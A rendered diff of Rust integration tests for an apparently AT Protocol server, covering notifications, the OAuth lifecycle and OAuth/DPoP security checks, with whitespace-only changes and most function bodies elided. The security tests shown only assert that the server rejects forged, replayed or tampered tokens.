let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await;
368
assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation");
369
}
370
+
371
#[tokio::test]
372
async fn test_service_auth_lifecycle() {
373
let client = client();
···
399
assert_eq!(claims["aud"], "did:web:api.bsky.app");
400
assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob");
401
}
402
+
403
#[tokio::test]
404
async fn test_request_account_delete() {
405
let client = client();
+1
tests/moderation.rs
+1
tests/moderation.rs
+4
tests/notifications.rs
+4
tests/notifications.rs
···
4
NotificationStatus, NotificationType,
5
};
6
use sqlx::PgPool;
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
9
sqlx::postgres::PgPoolOptions::new()
···
12
.await
13
.expect("Failed to connect to test database")
14
}
15
#[tokio::test]
16
async fn test_enqueue_notification() {
17
let pool = get_pool().await;
···
53
assert_eq!(row.notification_type, NotificationType::Welcome);
54
assert_eq!(row.status, NotificationStatus::Pending);
55
}
56
#[tokio::test]
57
async fn test_enqueue_welcome() {
58
let pool = get_pool().await;
···
82
assert!(row.body.contains(&format!("@{}", user_row.handle)));
83
assert_eq!(row.notification_type, NotificationType::Welcome);
84
}
85
#[tokio::test]
86
async fn test_notification_queue_status_index() {
87
let pool = get_pool().await;
···
4
NotificationStatus, NotificationType,
5
};
6
use sqlx::PgPool;
7
+
8
async fn get_pool() -> PgPool {
9
let conn_str = common::get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
+
17
#[tokio::test]
18
async fn test_enqueue_notification() {
19
let pool = get_pool().await;
···
55
assert_eq!(row.notification_type, NotificationType::Welcome);
56
assert_eq!(row.status, NotificationStatus::Pending);
57
}
58
+
59
#[tokio::test]
60
async fn test_enqueue_welcome() {
61
let pool = get_pool().await;
···
85
assert!(row.body.contains(&format!("@{}", user_row.handle)));
86
assert_eq!(row.notification_type, NotificationType::Welcome);
87
}
88
+
89
#[tokio::test]
90
async fn test_notification_queue_status_index() {
91
let pool = get_pool().await;
+3
tests/oauth.rs
+3
tests/oauth.rs
···
8
use sha2::{Digest, Sha256};
9
use wiremock::{Mock, MockServer, ResponseTemplate};
10
use wiremock::matchers::{method, path};
11
fn no_redirect_client() -> reqwest::Client {
12
reqwest::Client::builder()
13
.redirect(redirect::Policy::none())
14
.build()
15
.unwrap()
16
}
17
fn generate_pkce() -> (String, String) {
18
let verifier_bytes: [u8; 32] = rand::random();
19
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
23
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
24
(code_verifier, code_challenge)
25
}
26
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
27
let mock_server = MockServer::start().await;
28
let client_id = mock_server.uri();
···
8
use sha2::{Digest, Sha256};
9
use wiremock::{Mock, MockServer, ResponseTemplate};
10
use wiremock::matchers::{method, path};
11
+
12
fn no_redirect_client() -> reqwest::Client {
13
reqwest::Client::builder()
14
.redirect(redirect::Policy::none())
15
.build()
16
.unwrap()
17
}
18
+
19
fn generate_pkce() -> (String, String) {
20
let verifier_bytes: [u8; 32] = rand::random();
21
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
25
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
26
(code_verifier, code_challenge)
27
}
28
+
29
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
30
let mock_server = MockServer::start().await;
31
let client_id = mock_server.uri();
+18
tests/oauth_lifecycle.rs
+18
tests/oauth_lifecycle.rs
···
1
mod common;
2
mod helpers;
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
use chrono::Utc;
5
use common::{base_url, client};
···
9
use sha2::{Digest, Sha256};
10
use wiremock::{Mock, MockServer, ResponseTemplate};
11
use wiremock::matchers::{method, path};
12
fn generate_pkce() -> (String, String) {
13
let verifier_bytes: [u8; 32] = rand::random();
14
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
18
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
19
(code_verifier, code_challenge)
20
}
21
fn no_redirect_client() -> reqwest::Client {
22
reqwest::Client::builder()
23
.redirect(redirect::Policy::none())
24
.build()
25
.unwrap()
26
}
27
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
28
let mock_server = MockServer::start().await;
29
let client_id = mock_server.uri();
···
43
.await;
44
mock_server
45
}
46
struct OAuthSession {
47
access_token: String,
48
refresh_token: String,
49
did: String,
50
client_id: String,
51
}
52
async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) {
53
let url = base_url().await;
54
let http_client = client();
···
125
};
126
(session, mock_client)
127
}
128
#[tokio::test]
129
async fn test_oauth_token_can_create_and_read_records() {
130
let url = base_url().await;
···
169
let get_body: Value = get_res.json().await.unwrap();
170
assert_eq!(get_body["value"]["text"], post_text);
171
}
172
#[tokio::test]
173
async fn test_oauth_token_can_upload_blob() {
174
let url = base_url().await;
···
191
assert!(upload_body["blob"]["ref"]["$link"].is_string());
192
assert_eq!(upload_body["blob"]["mimeType"], "text/plain");
193
}
194
#[tokio::test]
195
async fn test_oauth_token_can_describe_repo() {
196
let url = base_url().await;
···
211
assert_eq!(describe_body["did"], session.did);
212
assert!(describe_body["handle"].is_string());
213
}
214
#[tokio::test]
215
async fn test_oauth_full_post_lifecycle_create_edit_delete() {
216
let url = base_url().await;
···
300
get_deleted_res.status()
301
);
302
}
303
#[tokio::test]
304
async fn test_oauth_batch_operations_apply_writes() {
305
let url = base_url().await;
···
367
let records = list_body["records"].as_array().unwrap();
368
assert!(records.len() >= 3, "Should have at least 3 records from batch");
369
}
370
#[tokio::test]
371
async fn test_oauth_token_refresh_maintains_access() {
372
let url = base_url().await;
···
437
let records = list_body["records"].as_array().unwrap();
438
assert_eq!(records.len(), 2, "Should have both posts");
439
}
440
#[tokio::test]
441
async fn test_oauth_revoked_token_cannot_access_resources() {
442
let url = base_url().await;
···
481
.unwrap();
482
assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work");
483
}
484
#[tokio::test]
485
async fn test_oauth_multiple_clients_same_user() {
486
let url = base_url().await;
···
640
let records = list_body["records"].as_array().unwrap();
641
assert_eq!(records.len(), 2, "Both posts should be visible to either client");
642
}
643
#[tokio::test]
644
async fn test_oauth_social_interactions_follow_like_repost() {
645
let url = base_url().await;
···
757
let likes = likes_body["records"].as_array().unwrap();
758
assert_eq!(likes.len(), 1, "Bob should have 1 like");
759
}
760
#[tokio::test]
761
async fn test_oauth_cannot_modify_other_users_repo() {
762
let url = base_url().await;
···
804
let posts = posts_body["records"].as_array().unwrap();
805
assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob");
806
}
807
#[tokio::test]
808
async fn test_oauth_session_isolation_between_users() {
809
let url = base_url().await;
···
878
assert_eq!(bob_posts.len(), 1);
879
assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts");
880
}
881
#[tokio::test]
882
async fn test_oauth_token_works_with_sync_endpoints() {
883
let url = base_url().await;
···
1
mod common;
2
mod helpers;
3
+
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
5
use chrono::Utc;
6
use common::{base_url, client};
···
10
use sha2::{Digest, Sha256};
11
use wiremock::{Mock, MockServer, ResponseTemplate};
12
use wiremock::matchers::{method, path};
13
+
14
fn generate_pkce() -> (String, String) {
15
let verifier_bytes: [u8; 32] = rand::random();
16
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
20
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
21
(code_verifier, code_challenge)
22
}
23
+
24
fn no_redirect_client() -> reqwest::Client {
25
reqwest::Client::builder()
26
.redirect(redirect::Policy::none())
27
.build()
28
.unwrap()
29
}
30
+
31
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
32
let mock_server = MockServer::start().await;
33
let client_id = mock_server.uri();
···
47
.await;
48
mock_server
49
}
50
+
51
struct OAuthSession {
52
access_token: String,
53
refresh_token: String,
54
did: String,
55
client_id: String,
56
}
57
+
58
async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) {
59
let url = base_url().await;
60
let http_client = client();
···
131
};
132
(session, mock_client)
133
}
134
+
135
#[tokio::test]
136
async fn test_oauth_token_can_create_and_read_records() {
137
let url = base_url().await;
···
176
let get_body: Value = get_res.json().await.unwrap();
177
assert_eq!(get_body["value"]["text"], post_text);
178
}
179
+
180
#[tokio::test]
181
async fn test_oauth_token_can_upload_blob() {
182
let url = base_url().await;
···
199
assert!(upload_body["blob"]["ref"]["$link"].is_string());
200
assert_eq!(upload_body["blob"]["mimeType"], "text/plain");
201
}
202
+
203
#[tokio::test]
204
async fn test_oauth_token_can_describe_repo() {
205
let url = base_url().await;
···
220
assert_eq!(describe_body["did"], session.did);
221
assert!(describe_body["handle"].is_string());
222
}
223
+
224
#[tokio::test]
225
async fn test_oauth_full_post_lifecycle_create_edit_delete() {
226
let url = base_url().await;
···
310
get_deleted_res.status()
311
);
312
}
313
+
314
#[tokio::test]
315
async fn test_oauth_batch_operations_apply_writes() {
316
let url = base_url().await;
···
378
let records = list_body["records"].as_array().unwrap();
379
assert!(records.len() >= 3, "Should have at least 3 records from batch");
380
}
381
+
382
#[tokio::test]
383
async fn test_oauth_token_refresh_maintains_access() {
384
let url = base_url().await;
···
449
let records = list_body["records"].as_array().unwrap();
450
assert_eq!(records.len(), 2, "Should have both posts");
451
}
452
+
453
#[tokio::test]
454
async fn test_oauth_revoked_token_cannot_access_resources() {
455
let url = base_url().await;
···
494
.unwrap();
495
assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work");
496
}
497
+
498
#[tokio::test]
499
async fn test_oauth_multiple_clients_same_user() {
500
let url = base_url().await;
···
654
let records = list_body["records"].as_array().unwrap();
655
assert_eq!(records.len(), 2, "Both posts should be visible to either client");
656
}
657
+
658
#[tokio::test]
659
async fn test_oauth_social_interactions_follow_like_repost() {
660
let url = base_url().await;
···
772
let likes = likes_body["records"].as_array().unwrap();
773
assert_eq!(likes.len(), 1, "Bob should have 1 like");
774
}
775
+
776
#[tokio::test]
777
async fn test_oauth_cannot_modify_other_users_repo() {
778
let url = base_url().await;
···
820
let posts = posts_body["records"].as_array().unwrap();
821
assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob");
822
}
823
+
824
#[tokio::test]
825
async fn test_oauth_session_isolation_between_users() {
826
let url = base_url().await;
···
895
assert_eq!(bob_posts.len(), 1);
896
assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts");
897
}
898
+
899
#[tokio::test]
900
async fn test_oauth_token_works_with_sync_endpoints() {
901
let url = base_url().await;
+56
tests/oauth_security.rs
+56
tests/oauth_security.rs
···
12
use sha2::{Digest, Sha256};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
use wiremock::matchers::{method, path};
15
fn no_redirect_client() -> reqwest::Client {
16
reqwest::Client::builder()
17
.redirect(redirect::Policy::none())
18
.build()
19
.unwrap()
20
}
21
fn generate_pkce() -> (String, String) {
22
let verifier_bytes: [u8; 32] = rand::random();
23
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
27
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
28
(code_verifier, code_challenge)
29
}
30
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
31
let mock_server = MockServer::start().await;
32
let client_id = mock_server.uri();
···
46
.await;
47
mock_server
48
}
49
async fn get_oauth_tokens(
50
http_client: &reqwest::Client,
51
url: &str,
···
117
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
118
(access_token, refresh_token, client_id)
119
}
120
#[tokio::test]
121
async fn test_security_forged_token_signature_rejected() {
122
let url = base_url().await;
···
134
.unwrap();
135
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
136
}
137
#[tokio::test]
138
async fn test_security_modified_payload_rejected() {
139
let url = base_url().await;
···
153
.unwrap();
154
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
155
}
156
#[tokio::test]
157
async fn test_security_algorithm_none_attack_rejected() {
158
let url = base_url().await;
···
181
.unwrap();
182
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
183
}
184
#[tokio::test]
185
async fn test_security_algorithm_substitution_attack_rejected() {
186
let url = base_url().await;
···
209
.unwrap();
210
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
211
}
212
#[tokio::test]
213
async fn test_security_expired_token_rejected() {
214
let url = base_url().await;
···
237
.unwrap();
238
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
239
}
240
#[tokio::test]
241
async fn test_security_pkce_plain_method_rejected() {
242
let url = base_url().await;
···
264
"Error should mention S256 requirement"
265
);
266
}
267
#[tokio::test]
268
async fn test_security_pkce_missing_challenge_rejected() {
269
let url = base_url().await;
···
283
.unwrap();
284
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
285
}
286
#[tokio::test]
287
async fn test_security_pkce_wrong_verifier_rejected() {
288
let url = base_url().await;
···
352
let body: Value = token_res.json().await.unwrap();
353
assert_eq!(body["error"], "invalid_grant");
354
}
355
#[tokio::test]
356
async fn test_security_authorization_code_replay_attack() {
357
let url = base_url().await;
···
434
let body: Value = replay_res.json().await.unwrap();
435
assert_eq!(body["error"], "invalid_grant");
436
}
437
#[tokio::test]
438
async fn test_security_refresh_token_replay_attack() {
439
let url = base_url().await;
···
550
"Token family should be revoked after replay detection"
551
);
552
}
553
#[tokio::test]
554
async fn test_security_redirect_uri_manipulation() {
555
let url = base_url().await;
···
573
.unwrap();
574
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
575
}
576
#[tokio::test]
577
async fn test_security_deactivated_account_blocked() {
578
let url = base_url().await;
···
639
let body: Value = auth_res.json().await.unwrap();
640
assert_eq!(body["error"], "access_denied");
641
}
642
#[tokio::test]
643
async fn test_security_url_injection_in_state_parameter() {
644
let url = base_url().await;
···
710
location
711
);
712
}
713
#[tokio::test]
714
async fn test_security_cross_client_token_theft() {
715
let url = base_url().await;
···
789
"Error should mention client_id mismatch"
790
);
791
}
792
#[test]
793
fn test_security_dpop_nonce_tamper_detection() {
794
let secret = b"test-dpop-secret-32-bytes-long!!";
···
803
let result = verifier.validate_nonce(&tampered_nonce);
804
assert!(result.is_err(), "Tampered nonce should be rejected");
805
}
806
#[test]
807
fn test_security_dpop_nonce_cross_server_rejected() {
808
let secret1 = b"server-1-secret-32-bytes-long!!!";
···
813
let result = verifier2.validate_nonce(&nonce_from_server1);
814
assert!(result.is_err(), "Nonce from different server should be rejected");
815
}
816
#[test]
817
fn test_security_dpop_proof_signature_tampering() {
818
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
851
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
852
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
853
}
854
#[test]
855
fn test_security_dpop_proof_key_substitution() {
856
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
888
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
889
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
890
}
891
#[test]
892
fn test_security_jwk_thumbprint_consistency() {
893
let jwk = DPoPJwk {
···
905
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
906
}
907
}
908
#[test]
909
fn test_security_dpop_iat_clock_skew_limits() {
910
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
956
}
957
}
958
}
959
#[test]
960
fn test_security_dpop_method_case_insensitivity() {
961
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
992
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
993
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
994
}
995
#[tokio::test]
996
async fn test_security_invalid_grant_type_rejected() {
997
let url = base_url().await;
···
1024
);
1025
}
1026
}
1027
#[tokio::test]
1028
async fn test_security_token_with_wrong_typ_rejected() {
1029
let url = base_url().await;
···
1066
);
1067
}
1068
}
1069
#[tokio::test]
1070
async fn test_security_missing_required_claims_rejected() {
1071
let url = base_url().await;
···
1098
);
1099
}
1100
}
1101
#[tokio::test]
1102
async fn test_security_malformed_tokens_rejected() {
1103
let url = base_url().await;
···
1130
);
1131
}
1132
}
1133
#[tokio::test]
1134
async fn test_security_authorization_header_formats() {
1135
let url = base_url().await;
···
1175
);
1176
}
1177
}
1178
#[tokio::test]
1179
async fn test_security_no_authorization_header() {
1180
let url = base_url().await;
···
1186
.unwrap();
1187
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1188
}
1189
#[tokio::test]
1190
async fn test_security_empty_authorization_header() {
1191
let url = base_url().await;
···
1198
.unwrap();
1199
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1200
}
1201
#[tokio::test]
1202
async fn test_security_revoked_token_rejected() {
1203
let url = base_url().await;
···
1219
let introspect_body: Value = introspect_res.json().await.unwrap();
1220
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1221
}
1222
#[tokio::test]
1223
#[ignore = "rate limiting is disabled in test environment"]
1224
async fn test_security_oauth_authorize_rate_limiting() {
···
1274
rate_limited_count
1275
);
1276
}
1277
fn create_dpop_proof(
1278
method: &str,
1279
uri: &str,
···
1317
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1318
format!("{}.{}", signing_input, signature_b64)
1319
}
1320
#[test]
1321
fn test_dpop_nonce_generation() {
1322
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1326
assert!(!nonce1.is_empty());
1327
assert!(!nonce2.is_empty());
1328
}
1329
#[test]
1330
fn test_dpop_nonce_validation_success() {
1331
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1334
let result = verifier.validate_nonce(&nonce);
1335
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1336
}
1337
#[test]
1338
fn test_dpop_nonce_wrong_secret() {
1339
let secret1 = b"test-dpop-secret-32-bytes-long!!";
···
1344
let result = verifier2.validate_nonce(&nonce);
1345
assert!(result.is_err(), "Nonce from different secret should fail");
1346
}
1347
#[test]
1348
fn test_dpop_nonce_invalid_format() {
1349
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1352
assert!(verifier.validate_nonce("").is_err());
1353
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1354
}
1355
#[test]
1356
fn test_jwk_thumbprint_ec_p256() {
1357
let jwk = DPoPJwk {
···
1366
assert!(!tp.is_empty());
1367
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1368
}
1369
#[test]
1370
fn test_jwk_thumbprint_ec_secp256k1() {
1371
let jwk = DPoPJwk {
···
1377
let thumbprint = compute_jwk_thumbprint(&jwk);
1378
assert!(thumbprint.is_ok());
1379
}
1380
#[test]
1381
fn test_jwk_thumbprint_okp_ed25519() {
1382
let jwk = DPoPJwk {
···
1388
let thumbprint = compute_jwk_thumbprint(&jwk);
1389
assert!(thumbprint.is_ok());
1390
}
1391
#[test]
1392
fn test_jwk_thumbprint_missing_crv() {
1393
let jwk = DPoPJwk {
···
1399
let thumbprint = compute_jwk_thumbprint(&jwk);
1400
assert!(thumbprint.is_err());
1401
}
1402
#[test]
1403
fn test_jwk_thumbprint_missing_x() {
1404
let jwk = DPoPJwk {
···
1410
let thumbprint = compute_jwk_thumbprint(&jwk);
1411
assert!(thumbprint.is_err());
1412
}
1413
#[test]
1414
fn test_jwk_thumbprint_missing_y_for_ec() {
1415
let jwk = DPoPJwk {
···
1421
let thumbprint = compute_jwk_thumbprint(&jwk);
1422
assert!(thumbprint.is_err());
1423
}
1424
#[test]
1425
fn test_jwk_thumbprint_unsupported_key_type() {
1426
let jwk = DPoPJwk {
···
1432
let thumbprint = compute_jwk_thumbprint(&jwk);
1433
assert!(thumbprint.is_err());
1434
}
1435
#[test]
1436
fn test_jwk_thumbprint_deterministic() {
1437
let jwk = DPoPJwk {
···
1444
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1445
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1446
}
1447
#[test]
1448
fn test_dpop_proof_invalid_format() {
1449
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1453
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1454
assert!(result.is_err());
1455
}
1456
#[test]
1457
fn test_dpop_proof_invalid_typ() {
1458
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1479
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1480
assert!(result.is_err());
1481
}
1482
#[test]
1483
fn test_dpop_proof_method_mismatch() {
1484
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1487
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1488
assert!(result.is_err());
1489
}
1490
#[test]
1491
fn test_dpop_proof_uri_mismatch() {
1492
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1495
let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1496
assert!(result.is_err());
1497
}
1498
#[test]
1499
fn test_dpop_proof_iat_too_old() {
1500
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1503
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1504
assert!(result.is_err());
1505
}
1506
#[test]
1507
fn test_dpop_proof_iat_future() {
1508
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1511
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1512
assert!(result.is_err());
1513
}
1514
#[test]
1515
fn test_dpop_proof_ath_mismatch() {
1516
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1530
);
1531
assert!(result.is_err());
1532
}
1533
#[test]
1534
fn test_dpop_proof_missing_ath_when_required() {
1535
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1543
);
1544
assert!(result.is_err());
1545
}
1546
#[test]
1547
fn test_dpop_proof_uri_ignores_query_params() {
1548
let secret = b"test-dpop-secret-32-bytes-long!!";
···
12
use sha2::{Digest, Sha256};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
use wiremock::matchers::{method, path};
15
+
16
fn no_redirect_client() -> reqwest::Client {
17
reqwest::Client::builder()
18
.redirect(redirect::Policy::none())
19
.build()
20
.unwrap()
21
}
22
+
23
fn generate_pkce() -> (String, String) {
24
let verifier_bytes: [u8; 32] = rand::random();
25
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
29
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
30
(code_verifier, code_challenge)
31
}
32
+
33
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
34
let mock_server = MockServer::start().await;
35
let client_id = mock_server.uri();
···
49
.await;
50
mock_server
51
}
52
+
53
async fn get_oauth_tokens(
54
http_client: &reqwest::Client,
55
url: &str,
···
121
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
122
(access_token, refresh_token, client_id)
123
}
124
+
125
#[tokio::test]
126
async fn test_security_forged_token_signature_rejected() {
127
let url = base_url().await;
···
139
.unwrap();
140
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
141
}
142
+
143
#[tokio::test]
144
async fn test_security_modified_payload_rejected() {
145
let url = base_url().await;
···
159
.unwrap();
160
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
161
}
162
+
163
#[tokio::test]
164
async fn test_security_algorithm_none_attack_rejected() {
165
let url = base_url().await;
···
188
.unwrap();
189
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
190
}
191
+
192
#[tokio::test]
193
async fn test_security_algorithm_substitution_attack_rejected() {
194
let url = base_url().await;
···
217
.unwrap();
218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
219
}
220
+
221
#[tokio::test]
222
async fn test_security_expired_token_rejected() {
223
let url = base_url().await;
···
246
.unwrap();
247
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
248
}
249
+
250
#[tokio::test]
251
async fn test_security_pkce_plain_method_rejected() {
252
let url = base_url().await;
···
274
"Error should mention S256 requirement"
275
);
276
}
277
+
278
#[tokio::test]
279
async fn test_security_pkce_missing_challenge_rejected() {
280
let url = base_url().await;
···
294
.unwrap();
295
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
296
}
297
+
298
#[tokio::test]
299
async fn test_security_pkce_wrong_verifier_rejected() {
300
let url = base_url().await;
···
364
let body: Value = token_res.json().await.unwrap();
365
assert_eq!(body["error"], "invalid_grant");
366
}
367
+
368
#[tokio::test]
369
async fn test_security_authorization_code_replay_attack() {
370
let url = base_url().await;
···
447
let body: Value = replay_res.json().await.unwrap();
448
assert_eq!(body["error"], "invalid_grant");
449
}
450
+
451
#[tokio::test]
452
async fn test_security_refresh_token_replay_attack() {
453
let url = base_url().await;
···
564
"Token family should be revoked after replay detection"
565
);
566
}
567
+
568
#[tokio::test]
569
async fn test_security_redirect_uri_manipulation() {
570
let url = base_url().await;
···
588
.unwrap();
589
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
590
}
591
+
592
#[tokio::test]
593
async fn test_security_deactivated_account_blocked() {
594
let url = base_url().await;
···
655
let body: Value = auth_res.json().await.unwrap();
656
assert_eq!(body["error"], "access_denied");
657
}
658
+
659
#[tokio::test]
660
async fn test_security_url_injection_in_state_parameter() {
661
let url = base_url().await;
···
727
location
728
);
729
}
730
+
731
#[tokio::test]
732
async fn test_security_cross_client_token_theft() {
733
let url = base_url().await;
···
807
"Error should mention client_id mismatch"
808
);
809
}
810
+
811
#[test]
812
fn test_security_dpop_nonce_tamper_detection() {
813
let secret = b"test-dpop-secret-32-bytes-long!!";
···
822
let result = verifier.validate_nonce(&tampered_nonce);
823
assert!(result.is_err(), "Tampered nonce should be rejected");
824
}
825
+
826
#[test]
827
fn test_security_dpop_nonce_cross_server_rejected() {
828
let secret1 = b"server-1-secret-32-bytes-long!!!";
···
833
let result = verifier2.validate_nonce(&nonce_from_server1);
834
assert!(result.is_err(), "Nonce from different server should be rejected");
835
}
836
+
837
#[test]
838
fn test_security_dpop_proof_signature_tampering() {
839
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
872
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
873
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
874
}
875
+
876
#[test]
877
fn test_security_dpop_proof_key_substitution() {
878
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
910
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
911
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
912
}
913
+
914
#[test]
915
fn test_security_jwk_thumbprint_consistency() {
916
let jwk = DPoPJwk {
···
928
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
929
}
930
}
931
+
932
#[test]
933
fn test_security_dpop_iat_clock_skew_limits() {
934
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
980
}
981
}
982
}
983
+
984
#[test]
985
fn test_security_dpop_method_case_insensitivity() {
986
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
1017
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1018
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
1019
}
1020
+
1021
#[tokio::test]
1022
async fn test_security_invalid_grant_type_rejected() {
1023
let url = base_url().await;
···
1050
);
1051
}
1052
}
1053
+
1054
#[tokio::test]
1055
async fn test_security_token_with_wrong_typ_rejected() {
1056
let url = base_url().await;
···
1093
);
1094
}
1095
}
1096
+
1097
#[tokio::test]
1098
async fn test_security_missing_required_claims_rejected() {
1099
let url = base_url().await;
···
1126
);
1127
}
1128
}
1129
+
1130
#[tokio::test]
1131
async fn test_security_malformed_tokens_rejected() {
1132
let url = base_url().await;
···
1159
);
1160
}
1161
}
1162
+
1163
#[tokio::test]
1164
async fn test_security_authorization_header_formats() {
1165
let url = base_url().await;
···
1205
);
1206
}
1207
}
1208
+
1209
#[tokio::test]
1210
async fn test_security_no_authorization_header() {
1211
let url = base_url().await;
···
1217
.unwrap();
1218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1219
}
1220
+
1221
#[tokio::test]
1222
async fn test_security_empty_authorization_header() {
1223
let url = base_url().await;
···
1230
.unwrap();
1231
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1232
}
1233
+
1234
#[tokio::test]
1235
async fn test_security_revoked_token_rejected() {
1236
let url = base_url().await;
···
1252
let introspect_body: Value = introspect_res.json().await.unwrap();
1253
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1254
}
1255
+
1256
#[tokio::test]
1257
#[ignore = "rate limiting is disabled in test environment"]
1258
async fn test_security_oauth_authorize_rate_limiting() {
···
1308
rate_limited_count
1309
);
1310
}
1311
+
1312
fn create_dpop_proof(
1313
method: &str,
1314
uri: &str,
···
1352
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1353
format!("{}.{}", signing_input, signature_b64)
1354
}
1355
+
1356
#[test]
1357
fn test_dpop_nonce_generation() {
1358
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1362
assert!(!nonce1.is_empty());
1363
